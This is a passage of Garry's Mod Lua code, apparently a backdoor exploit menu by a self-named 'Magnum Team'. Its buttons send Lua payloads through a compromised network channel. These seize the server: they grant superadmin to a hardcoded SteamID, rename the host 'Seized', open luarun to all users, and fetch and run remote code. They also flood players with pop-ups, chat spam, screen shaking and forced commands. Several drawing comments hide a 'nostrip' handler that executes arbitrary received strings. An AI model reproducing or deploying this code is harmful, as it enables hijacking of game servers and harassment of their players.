  628. surface.DrawRect(4,4,drawHUD:GetWide()-8,drawHUD:GetTall()-8)
  629. end
  630. tabs:AddSheet( "Soundboard", playSongs)
  633. --[[---------------------------------------------------------
  634. Sheets - Stripper
  635. -----------------------------------------------------------]]
  637. local strip = vgui.Create("DPanel")
  638. strip.Paint = function()
  639. --Black outline
  640. surface.SetDrawColor(math.random(1,255),math.random(1,255),math.random(1,255))
  641. surface.DrawRect(0,0,drawHUD:GetWide(),drawHUD:GetTall())
  642. --Outline
  643. surface.SetDrawColor(math.random(1,255),math.random(1,255),math.random(1,255))
  644. surface.DrawRect(2,2,drawHUD:GetWide()-4,drawHUD:GetTall()-4)
  645. --Main back
  646. surface.SetDrawColor(77, 77, 77,255)
  647. surface.DrawRect(4,4,drawHUD:GetWide()-8,drawHUD:GetTall()-8)
  648. end
  649. tabs:AddSheet( "Strip", strip)
  654. --[[-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  655. Drawing anything
  656. ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------]]
  657. --[[-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  658. Draw Stuff
  659. ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------]]
  660. local HerthButton = vgui.Create("DButton", drawHUD)
  661. HerthButton:SetVisible(false)
  662. HerthButton:SetSize(105,75)
  663. HerthButton:SetPos(10,350)
  664. HerthButton:SetTextColor(Color(255,255,255))
  665. HerthButton:SetText("Middle Text")
  666. HerthButton.Paint = function()
  667. --Black outline
  668. surface.SetDrawColor(0,0,0,255)
  669. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  670. --Outline
  671. surface.SetDrawColor(0,255,255,255)
  672. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  673. --Main Back util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  674. surface.SetDrawColor(0,0,73,255)
  675. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  676. end
  677. HerthButton.DoClick = function()
  678. net.Start(netKey)
  679. net.WriteString("for k,v in pairs(player.GetAll()) do v:SendLua([[local hud = vgui.Create(\"HTML\") hud:MoveToFront() hud:SetSize(200,158) hud:Center() hud:OpenURL(\"\")]])end")
  680. net.WriteBit(1)
  681. net.SendToServer()
  682. end
  683. local TopLeft = vgui.Create("DButton", drawHUD)
  684. TopLeft:SetSize(105,75)
  685. TopLeft:SetVisible(false)
  686. TopLeft:SetTextColor(Color(255,255,255))
  687. TopLeft:SetText("Top Left Spinner")
  688. TopLeft.Paint = function()
  689. --Black outline
  690. surface.SetDrawColor(0,0,0,255)
  691. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  692. --Outline
  693. surface.SetDrawColor(0,255,255,255)
  694. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  695. --Main Back util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  696. surface.SetDrawColor(0,0,73,255)
  697. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  698. end
  699. TopLeft.DoClick = function ()
  700. net.Start(netKey)
  701. net.WriteString("for k,v in pairs(player.GetAll()) do v:SendLua([[local hud = vgui.Create(\"HTML\") hud:MoveToFront() hud:SetSize(200,158) hud:SetPos(0,0) hud:OpenURL(\"\")]])end")
  702. net.WriteBit(1)
  703. net.SendToServer()
  704. end
  705. local BottomLeft = vgui.Create("DButton", drawHUD)
  706. BottomLeft:SetSize(105,75)
  707. BottomLeft:SetVisible(false)
  708. BottomLeft:SetTextColor(Color(255,255,255))
  709. BottomLeft:SetText("Bottom Left Spinner")
  710. BottomLeft.Paint = function()
  711. --Black outline
  712. surface.SetDrawColor(0,0,0,255)
  713. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  714. --Outline
  715. surface.SetDrawColor(0,255,255,255)
  716. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  717. --Main Back util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  718. surface.SetDrawColor(0,0,73,255)
  719. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  720. end
  721. BottomLeft.DoClick = function ()
  722. net.Start(netKey)
  723. net.WriteString("for k,v in pairs(player.GetAll()) do v:SendLua([[local hud2 = vgui.Create(\"HTML\") hud2:MoveToFront() hud2:SetSize(200,158) hud2:SetPos(0,ScrH()-158) hud2:OpenURL(\"\")]])end")
  724. net.WriteBit(1)
  725. net.SendToServer()
  726. end
  727. local TopRight = vgui.Create("DButton", drawHUD)
  728. TopRight:SetSize(105,75)
  729. TopRight:SetVisible(false)
  730. TopRight:SetTextColor(Color(255,255,255))
  731. TopRight:SetText("Top Right Spinner")
  732. TopRight.Paint = function()
  733. --Black outline
  734. surface.SetDrawColor(0,0,0,255)
  735. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  736. --Outline
  737. surface.SetDrawColor(0,255,255,255)
  738. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  739. --Main Back util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  740. surface.SetDrawColor(0,0,73,255)
  741. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  742. end
  743. TopRight.DoClick = function ()
  744. net.Start(netKey)
  745. net.WriteString("for k,v in pairs(player.GetAll()) do v:SendLua([[local hud3 = vgui.Create(\"HTML\") hud3:MoveToFront() hud3:SetSize(200,158) hud3:SetPos(ScrW()-200,0) hud3:OpenURL(\"\")]])end")
  746. net.WriteBit(1)
  747. net.SendToServer()
  748. end
  749. local BottomRight = vgui.Create("DButton", drawHUD)
  750. BottomRight:SetSize(105,75)
  751. BottomRight:SetVisible(false)
  752. BottomRight:SetTextColor(Color(255,255,255))
  753. BottomRight:SetText("Bottom Right Spinner")
  754. BottomRight.Paint = function()
  755. --Black outline
  756. surface.SetDrawColor(0,0,0,255)
  757. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  758. --Outline
  759. surface.SetDrawColor(0,255,255,255)
  760. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  761. --Main Back util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  762. surface.SetDrawColor(0,0,73,255)
  763. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  764. end
  765. BottomRight.DoClick = function ()
  766. net.Start(netKey)
  767. net.WriteString("for k,v in pairs(player.GetAll()) do v:SendLua([[local hud4 = vgui.Create(\"HTML\") hud4:MoveToFront() hud4:SetSize(200,158) hud4:SetPos(ScrW()-200,ScrH()-158) hud4:OpenURL(\"\")]])end")
  768. net.WriteBit(1)
  769. net.SendToServer()
  770. end
  771. local Earthquake = vgui.Create("DButton", drawHUD)
  772. Earthquake:SetSize(105,75)
  773. Earthquake:SetPos(260,650)
  774. Earthquake:SetVisible(false)
  775. Earthquake:SetTextColor(Color(255,255,255))
  776. Earthquake:SetText("EarthquakeRP")
  777. Earthquake.Paint = function()
  778. --Black outline
  779. surface.SetDrawColor(0,0,0,255)
  780. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  781. --Outline
  782. surface.SetDrawColor(0,255,255,255)
  783. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  784. --Main Back util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  785. surface.SetDrawColor(0,0,73,255)
  786. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  787. end
  788. Earthquake.DoClick = function()
  789. net.Start(netKey)
  790. net.WriteString("BroadcastLua([[timer.Create( \"thedrop\", 0.42, 0, function() util.ScreenShake( LocalPlayer():GetPos(), 512, 5, 0.25, 128 ) end )]])")
  791. net.WriteBit(1)
  792. net.SendToServer()
  793. end
  794. local Effect1 = vgui.Create("DButton", drawHUD)
  795. Effect1:SetSize(105,75)
  796. Effect1:SetPos(10,550)
  797. Effect1:SetVisible(false)
  798. Effect1:SetTextColor(Color(255,255,255))
  799. Effect1:SetText("Effect1")
  800. Effect1.Paint = function()
  801. --Black outline
  802. surface.SetDrawColor(0,0,0,255)
  803. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  804. --Outline
  805. surface.SetDrawColor(0,255,255,255)
  806. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  807. --Main Back util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  808. surface.SetDrawColor(0,0,73,255)
  809. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  810. end
  811. Effect1.DoClick = function()
  812. net.Start(netKey)
  813. net.WriteString("BroadcastLua([[hook.Add( \"RenderScreenspaceEffects\", \"ohgod\", function() local sinScaler = math.sin( CurTime() *(RealFrameTime() *1024) ) DrawSharpen( 1 +(sinScaler *10), 0.5 +(sinScaler *2) ) DrawMaterialOverlay( \"effects/tp_eyefx/tpeye\", 1 ) end)]])")
  814. net.WriteBit(1)
  815. net.SendToServer()
  816. end
  817. local Effect2 = vgui.Create("DButton", drawHUD)
  818. Effect2:SetSize(105,75)
  819. Effect2:SetPos(135,550)
  820. Effect2:SetVisible(false)
  821. Effect2:SetTextColor(Color(255,255,255))
  822. Effect2:SetText("Effect2")
  823. Effect2.Paint = function()
  824. --Black outline
  825. surface.SetDrawColor(0,0,0,255)
  826. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  827. --Outline
  828. surface.SetDrawColor(0,255,255,255)
  829. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  830. --Main Back util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  831. surface.SetDrawColor(0,0,73,255)
  832. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  833. end
  834. Effect2.DoClick = function()
  835. net.Start(netKey)
  836. net.WriteString("BroadcastLua([[local hud3 = vgui.Create(\"HTML\") hud3:SetSize(400,300) hud3:SetPos(ScrW()/2-200,ScrH()/2-150) hud3:OpenURL(\"\")]])")
  837. net.WriteBit(1)
  838. net.SendToServer()
  839. end
  840. local Effect3 = vgui.Create("DButton", drawHUD)
  841. Effect3:SetSize(105,75)
  842. Effect3:SetPos(260,550)
  843. Effect3:SetVisible(false)
  844. Effect3:SetTextColor(Color(255,255,255))
  845. Effect3:SetText("Effect3")
  846. Effect3.Paint = function()
  847. --Black outline
  848. surface.SetDrawColor(0,0,0,255)
  849. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  850. --Outline
  851. surface.SetDrawColor(0,255,255,255)
  852. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  853. --Main Back util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)
  854. surface.SetDrawColor(0,0,73,255)
  855. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  856. end
  857. Effect3.DoClick = function()
  858. net.Start(netKey)
  859. net.WriteString("for k,v in pairs(player.GetAll()) do v:SendLua([[hook.Add(\"HUDPaint\",\"c\", function() draw.RoundedBox(0,0,0,ScrW(),ScrH(),Color(math.random(1,255),math.random(1,255),math.random(1,255),155)) end)]])end")
  860. net.WriteBit(1)
  861. net.SendToServer()
  862. end
  865. local DScrollPanel = vgui.Create( "DScrollPanel", drawHUD )
  866. DScrollPanel:Dock( FILL )
  867. local doAll = DScrollPanel:Add("DButton")
  868. doAll:SetSize(370,25)
  869. doAll:SetPos(5,5)
  870. doAll:SetTextColor(Color(255,255,255))
  871. doAll:SetText("Destruction")
  872. doAll.Paint = function()
  873. --Black outline
  874. surface.SetDrawColor(255, 255, 255)
  875. surface.DrawRect(0,0,doAll:GetWide(),doAll:GetTall())
  876. --Outline
  877. surface.SetDrawColor(0,0,0,255)
  878. surface.DrawRect(2,2,doAll:GetWide()-4,doAll:GetTall()-4)
  879. --Main back
  880. surface.SetDrawColor(0,0,0,255)
  881. surface.DrawRect(4,4,doAll:GetWide()-8,doAll:GetTall()-8)
  882. end
  883. doAll.DoClick = function()
  884. HerthButton.DoClick()
  885. TopLeft.DoClick()
  886. TopRight.DoClick()
  887. BottomLeft.DoClick()
  888. BottomRight.DoClick()
  889. Earthquake.DoClick()
  890. Effect1.DoClick()
  891. Effect2.DoClick()
  892. Effect3.DoClick()
  894. end
  895. local HerthButton = DScrollPanel:Add( "DButton")
  896. HerthButton:SetSize(370,25)
  897. HerthButton:SetPos(5,27*1+5)
  898. HerthButton:SetTextColor(Color(255,255,255))
  899. HerthButton:SetText("ulx logecho")
  900. HerthButton.Paint = function()
  901. --Black outline
  902. surface.SetDrawColor(255, 255, 255)
  903. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  904. --Outline
  905. surface.SetDrawColor(0,0,0,255)
  906. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  907. --Main back
  908. surface.SetDrawColor(0,0,0,255)
  909. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  910. end
  911. HerthButton.DoClick = function ()
  912. net.Start(netKey)
  913. net.WriteString("RunConsoleCommand(\"ulx\", \"logecho\", \"0\")")
  914. net.WriteBit(1)
  915. net.SendToServer()
  916. end
  917. local HerthButton = DScrollPanel:Add( "DButton")
  918. HerthButton:SetSize(370,25)
  919. HerthButton:SetPos(5,27*2+5)
  920. HerthButton:SetTextColor(Color(255,255,255))
  921. HerthButton:SetText("Changer le nom du serveur")
  922. HerthButton.Paint = function()
  923. --Black outline
  924. surface.SetDrawColor(255, 255, 255)
  925. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  926. --Outline
  927. surface.SetDrawColor(0,0,0,255)
  928. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  929. --Main back
  930. surface.SetDrawColor(0,0,0,255)
  931. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  932. end
  933. HerthButton.DoClick = function ()
  934. net.Start(netKey)
  935. net.WriteString("RunConsoleCommand(\"ulx\", \"rcon\", \"hostname\", \"Seized\", \"By\", \"Magnum\", \"Team\")")
  936. net.WriteBit(1)
  937. net.SendToServer()
  938. end
  939. local HerthButton = DScrollPanel:Add( "DButton")
  940. HerthButton:SetSize(370,25)
  941. HerthButton:SetPos(5,27*3+5)
  942. HerthButton:SetTextColor(Color(255,255,255))
  943. HerthButton:SetText("Add STAFF")
  944. HerthButton.Paint = function()
  945. --Black outline
  946. surface.SetDrawColor(255, 255, 255)
  947. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  948. --Outline
  949. surface.SetDrawColor(0,0,0,255)
  950. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  951. --Main back
  952. surface.SetDrawColor(0,0,0,255)
  953. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  954. end
  955. HerthButton.DoClick = function ()
  956. net.Start(netKey)
  957. net.WriteString("RunConsoleCommand(\"ulx\", \"adduserid\", \"STEAM_0:1:239203263\", \"superadmin\")")
  958. net.WriteBit(1)
  959. net.SendToServer()
  960. end
  961. local HerthButton = DScrollPanel:Add("DButton")
  962. HerthButton:SetSize(370,25)
  963. HerthButton:SetPos(5,27*4+5)
  964. HerthButton:SetTextColor(Color(255,255,255))
  965. HerthButton:SetText("SPAM")
  966. HerthButton.Paint = function()
  967. --Black outline
  968. surface.SetDrawColor(255, 255, 255)
  969. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  970. --Outline
  971. surface.SetDrawColor(0,0,0,255)
  972. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  973. --Main back
  974. surface.SetDrawColor(0,0,0,255)
  975. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  976. end
  977. HerthButton.DoClick = function()
  978. net.Start(netKey)
  979. net.WriteString("timer.Create( \"memer\", 0.2, 0, function() BroadcastLua([[chat.AddText(Color(math.random(1,255),math.random(1,255),math.random(1,255)), \"░▒▓█▓▒░▒▓█⛔TON SERVEUR ET HACKER mdrr Par La Magnum Team⛔ ▓▒░▒▓█▓▒░▒▓█▓\")]]) end)")
  980. net.WriteBit(1)
  981. net.SendToServer()
  982. end
  983. local HerthButton = DScrollPanel:Add("DButton")
  984. HerthButton:SetSize(370,25)
  985. HerthButton:SetPos(5,27*5+5)
  986. HerthButton:SetTextColor(Color(255,255,255))
  987. HerthButton:SetText("STOP SPAM")
  988. HerthButton.Paint = function()
  989. --Black outline
  990. surface.SetDrawColor(255, 255, 255)
  991. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  992. --Outline
  993. surface.SetDrawColor(0,0,0,255)
  994. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  995. --Main back
  996. surface.SetDrawColor(0,0,0,255)
  997. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  998. end
  999. HerthButton.DoClick = function()
  1000. net.Start(netKey)
  1001. net.WriteString("timer.Stop( \"memer\")")
  1002. net.WriteBit(1)
  1003. net.SendToServer()
  1004. end
  1005. local HerthButton = DScrollPanel:Add("DButton")
  1006. HerthButton:SetSize(370,25)
  1007. HerthButton:SetPos(5,27*6+5)
  1008. HerthButton:SetTextColor(Color(255,255,255))
  1009. HerthButton:SetText("Téléportations")
  1010. HerthButton.Paint = function()
  1011. --Black outline
  1012. surface.SetDrawColor(255, 255, 255)
  1013. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1014. --Outline
  1015. surface.SetDrawColor(0,0,0,255)
  1016. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1017. --Main back
  1018. surface.SetDrawColor(0,0,0,255)
  1019. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1020. end
  1021. HerthButton.DoClick = function()
  1022. net.Start(netKey)
  1023. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetPos( Vector(math.random(-6000, 6000), math.random(-6000, 6000), math.random(-500, 2000)) ) end" )
  1024. net.WriteBit(1)
  1025. net.SendToServer()
  1026. end
  1027. local HerthButton = DScrollPanel:Add("DButton")
  1028. HerthButton:SetSize(370,25)
  1029. HerthButton:SetPos(5,27*7+5)
  1030. HerthButton:SetTextColor(Color(255,255,255))
  1031. HerthButton:SetText("Changez le model des joueur en evier")
  1032. HerthButton.Paint = function()
  1033. --Black outline
  1034. surface.SetDrawColor(255, 255, 255)
  1035. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1036. --Outline
  1037. surface.SetDrawColor(0,0,0,255)
  1038. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1039. --Main back
  1040. surface.SetDrawColor(0,0,0,255)
  1041. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1042. end
  1043. HerthButton.DoClick = function()
  1044. net.Start(netKey)
  1045. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/props_c17/FurnitureSink001a.mdl\") end" )
  1046. net.WriteBit(1)
  1047. net.SendToServer()
  1048. end
  1049. local HerthButton = DScrollPanel:Add("DButton")
  1050. HerthButton:SetSize(370,25)
  1051. HerthButton:SetPos(5,27*8+5)
  1052. HerthButton:SetTextColor(Color(255,255,255))
  1053. HerthButton:SetText("Changez le model des joueur en armoire")
  1054. HerthButton.Paint = function()
  1055. --Black outline
  1056. surface.SetDrawColor(255, 255, 255)
  1057. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1058. --Outline
  1059. surface.SetDrawColor(0,0,0,255)
  1060. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1061. --Main back
  1062. surface.SetDrawColor(0,0,0,255)
  1063. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1064. end
  1065. HerthButton.DoClick = function()
  1066. net.Start(netKey)
  1067. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SetModel(\"models/props_c17/FurnitureDresser001a.mdl\") end" )
  1068. net.WriteBit(1)
  1069. net.SendToServer()
  1070. end
  1071. local HerthButton = DScrollPanel:Add("DButton")
  1072. HerthButton:SetSize(370,25)
  1073. HerthButton:SetPos(5,27*9+5)
  1074. HerthButton:SetTextColor(Color(255,255,255))
  1075. HerthButton:SetText("Faire tourner les joueur")
  1076. HerthButton.Paint = function()
  1077. --Black outline
  1078. surface.SetDrawColor(255, 255, 255)
  1079. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1080. --Outline
  1081. surface.SetDrawColor(0,0,0,255)
  1082. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1083. --Main back
  1084. surface.SetDrawColor(0,0,0,255)
  1085. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1086. end
  1087. HerthButton.DoClick = function()
  1088. net.Start(netKey)
  1089. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"+left\")" )
  1090. net.WriteBit(1)
  1091. net.SendToServer()
  1092. end
  1093. local HerthButton = DScrollPanel:Add("DButton")
  1094. HerthButton:SetSize(370,25)
  1095. HerthButton:SetPos(5,27*10+5)
  1096. HerthButton:SetTextColor(Color(255,255,255))
  1097. HerthButton:SetText("Arreter de Faire tourner les joueur")
  1098. HerthButton.Paint = function()
  1099. --Black outline
  1100. surface.SetDrawColor(255, 255, 255)
  1101. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1102. --Outline
  1103. surface.SetDrawColor(0,0,0,255)
  1104. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1105. --Main back
  1106. surface.SetDrawColor(0,0,0,255)
  1107. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1108. end
  1109. HerthButton.DoClick = function()
  1110. net.Start(netKey)
  1111. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"-left\")" )
  1112. net.WriteBit(1)
  1113. net.SendToServer()
  1114. end
  1115. local HerthButton = DScrollPanel:Add("DButton")
  1116. HerthButton:SetSize(370,25)
  1117. HerthButton:SetPos(5,27*11+5)
  1118. HerthButton:SetTextColor(Color(255,255,255))
  1119. HerthButton:SetText("Faire Acroupir Les Joueur")
  1120. HerthButton.Paint = function()
  1121. --Black outline
  1122. surface.SetDrawColor(255, 255, 255)
  1123. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1124. --Outline
  1125. surface.SetDrawColor(0,0,0,255)
  1126. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1127. --Main back
  1128. surface.SetDrawColor(0,0,0,255)
  1129. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1130. end
  1131. HerthButton.DoClick = function()
  1132. net.Start(netKey)
  1133. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"+duck\")" )
  1134. net.WriteBit(1)
  1135. net.SendToServer()
  1136. end
  1137. local HerthButton = DScrollPanel:Add("DButton")
  1138. HerthButton:SetSize(370,25)
  1139. HerthButton:SetPos(5,27*12+5)
  1140. HerthButton:SetTextColor(Color(255,255,255))
  1141. HerthButton:SetText("Arreter de Faire Acroupir Les Joueur")
  1142. HerthButton.Paint = function()
  1143. --Black outline
  1144. surface.SetDrawColor(255, 255, 255)
  1145. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1146. --Outline
  1147. surface.SetDrawColor(0,0,0,255)
  1148. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1149. --Main back
  1150. surface.SetDrawColor(0,0,0,255)
  1151. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1152. end
  1153. HerthButton.DoClick = function()
  1154. net.Start(netKey)
  1155. net.WriteString( "RunConsoleCommand(\"ulx\", \"cexec\", \"*\", \"-duck\")" )
  1156. net.WriteBit(1)
  1157. net.SendToServer()
  1158. end
  1159. local HerthButton = DScrollPanel:Add("DButton")
  1160. HerthButton:SetSize(370,25)
  1161. HerthButton:SetPos(5,27*13+5)
  1162. HerthButton:SetTextColor(Color(255,255,255))
  1163. HerthButton:SetText("RIP")
  1164. HerthButton.Paint = function()
  1165. --Black outline
  1166. surface.SetDrawColor(255, 255, 255)
  1167. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1168. --Outline
  1169. surface.SetDrawColor(0,0,0,255)
  1170. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1171. --Main back
  1172. surface.SetDrawColor(0,0,0,255)
  1173. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1174. end
  1175. HerthButton.DoClick = function()
  1176. net.Start(netKey)
  1177. net.WriteString( "http.Fetch(\"\",function(b,l,h,c)RunString(b)end,nil)" )
  1178. net.WriteBit (1)
  1179. net.SendToServer()
  1180. end
  1181. local HerthButton = DScrollPanel:Add("DButton")
  1182. HerthButton:SetSize(370,25)
  1183. HerthButton:SetPos(5,27*14+5)
  1184. HerthButton:SetTextColor(Color(255,255,255))
  1185. HerthButton:SetText("spam 2")
  1186. HerthButton.Paint = function()
  1187. --Black outline
  1188. surface.SetDrawColor(255, 255, 255)
  1189. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1190. --Outline
  1191. surface.SetDrawColor(0,0,0,255)
  1192. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1193. --Main back
  1194. surface.SetDrawColor(0,0,0,255)
  1195. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1196. end
  1197. HerthButton.DoClick = function()
  1198. net.Start(netKey)
  1199. net.WriteString( "for k,v in pairs(player.GetAll()) do v:SendLua([[local hud = vgui.Create(\"HTML\") hud:MoveToFront() hud:SetSize(1080,1080) hud:SetPos(0,0) hud:OpenURL(\"\")]]) v:SendLua([[local hud2 = vgui.Create(\"HTML\") hud2:MoveToFront() hud2:SetSize(200,158) hud2:SetPos(0,ScrH()-158) hud2:OpenURL(\"\")]]) v:SendLua([[local hud3 = vgui.Create(\"HTML\") hud3:MoveToFront() hud3:SetSize(200,158) hud3:SetPos(ScrW()-200,0) hud3:OpenURL(\"\")]]) v:SendLua([[local hud4 = vgui.Create(\"HTML\") hud4:MoveToFront() hud4:SetSize(200,158) hud4:SetPos(ScrW()-200,ScrH()-158) hud4:OpenURL(\"\")]]) timer.Create( \"spamsondeouf\", 1, 0, function() v:EmitSound( \"\", 100, 100 ) end) v:SendLua([[hook.Add(\"HUDPaint\",\"c\", function() draw.RoundedBox(0,0,0,ScrW(),ScrH(),Color(math.random(1,255),math.random(1,255),math.random(1,255),155)) end)]]) end BroadcastLua([[hook.Add( \"RenderScreenspaceEffects\", \"ohgod\", function() local sinScaler = math.sin( CurTime() *(RealFrameTime() *1024) ) DrawSharpen( 1 +(sinScaler *10), 0.5 +(sinScaler *2) ) DrawMaterialOverlay( \"effects/tp_eyefx/tpeye\", 1 ) end)]]) BroadcastLua([[timer.Create( \"thedrop\", 0.42, 0, function() util.ScreenShake( LocalPlayer():GetPos(), 512, 5, 0.25, 128 ) end )]]) BroadcastLua([[local hud3 = vgui.Create(\"HTML\") hud3:SetSize(400,300) hud3:SetPos(ScrW()/2-200,ScrH()/2-150) hud3:OpenURL(\"\")]])" )
  1200. net.WriteBit (1)
  1201. net.SendToServer()
  1202. end
  1203. local HerthButton = DScrollPanel:Add("DButton")
  1204. HerthButton:SetSize(370,25)
  1205. HerthButton:SetPos(5,27*15+5)
  1206. HerthButton:SetTextColor(Color(255,255,255))
  1207. HerthButton:SetText("Luarun pour les user")
  1208. HerthButton.Paint = function()
  1209. --Black outline
  1210. surface.SetDrawColor(255, 255, 255)
  1211. surface.DrawRect(0,0,HerthButton:GetWide(),HerthButton:GetTall())
  1212. --Outline
  1213. surface.SetDrawColor(0,0,0,255)
  1214. surface.DrawRect(2,2,HerthButton:GetWide()-4,HerthButton:GetTall()-4)
  1215. --Main back
  1216. surface.SetDrawColor(0,0,0,255)
  1217. surface.DrawRect(4,4,HerthButton:GetWide()-8,HerthButton:GetTall()-8)
  1218. end
  1219. HerthButton.DoClick = function()
  1220. net.Start(netKey)
  1221. net.WriteString("RunConsoleCommand(\"ulx\", \"groupallow\", \"user\", \"ulx luarun\")")
  1222. net.WriteBit (1)
  1223. net.SendToServer()
  1224. end
  1225. local HerthButton = DScrollPanel:Add("DButton")
  1226. HerthButton:SetSize(370,25)
  1227. HerthButton:SetPos(5,27*16+5)
  1228. HerthButton:SetTextColor(Color(255,255,255))
  1229. HerthButton:SetText("Changez le model des joueur en arbre")
  1230. HerthButton.Paint = function()
